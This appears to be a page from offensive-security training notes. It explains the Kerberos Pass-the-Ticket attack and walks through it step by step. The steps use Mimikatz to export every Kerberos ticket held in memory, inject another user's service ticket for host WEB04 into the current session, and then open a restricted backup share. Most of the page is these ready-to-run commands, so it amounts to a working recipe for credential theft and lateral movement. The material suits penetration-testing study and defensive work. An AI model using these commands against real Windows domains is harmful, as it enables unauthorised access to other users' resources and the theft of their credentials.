Pass The Ticket (PTT)

Pass the Ticket

The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, no administrative privileges are required.

We will extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our session. This will allow us to access the restricted folder.

This is an explanation based on examples.

# Check if our current user has access to resources or not.
ls \\web04\backup

# If access is denied then we will exclate our privilege.
# We will export all tickets.
 .\mimikatz.exe "privilege::debug" "log" "sekurlsa::tickets /export" "exit"
 
 # We can look for our interest ticket using the below command.
 dir *.kirbi
 
 # Pick any ticket 
 # example:  [0;149674][email protected]
  .\mimikatz.exe "kerberos::ptt  [0;149674][email protected]" "exit"
  
# List the ticket in memory to confirm
klist

# Try accessing the resource again.
ls \\web04\backup

PreviousOverpass the Hash NextDistributed Component Object Model (DCOM)

Last updated 1 year ago

hashtagPass the Ticket

Pass the Ticket